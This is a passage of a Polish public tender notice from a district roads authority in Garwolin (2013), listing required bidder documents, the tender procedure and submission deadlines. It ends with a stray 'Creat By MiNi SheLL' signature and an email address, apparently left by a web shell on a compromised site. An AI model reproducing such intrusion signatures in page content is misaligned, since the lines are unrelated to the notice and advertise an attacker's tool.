<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty, wypełniony kosztorys ofertowy, wykaz podmiotów, które będą uczestniczyć w wykonaniu zamówienia jako podwykonawcy wraz z podaniem ich nazw, a także zakresu wykonywanych przez nich czynności - załącznik nr 6 SIWZ, Wykaz posiadanego sprzętu laboratoryjnego, a w przypadku braku własnego laboratorium należy podać laboratorium, które będzie obsługiwało zamówienie, oświadczenie, że Wykonawca dysponuje środkami finansowymi w kwocie 550 000,00zł  niezbędnymi do wykonania zamówienia na załączniku Nr 2 SIWZ, , pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia gdy wykonawca sam nie dysponuje takim potencjałem. Kopia dokumentu wadialnego,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzdgarwolin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Garwolinie  ul. Przemysłowa 45,  08-410  Wola Rębkowska, pokój nr 6..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.07.2013 godzina 09:30, miejsce: Powiatowy Zarząd Dróg w Garwolinie ul. Przemysłowa 45,  08-410  Wola Rębkowska,  pokój nr 3  tj. sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com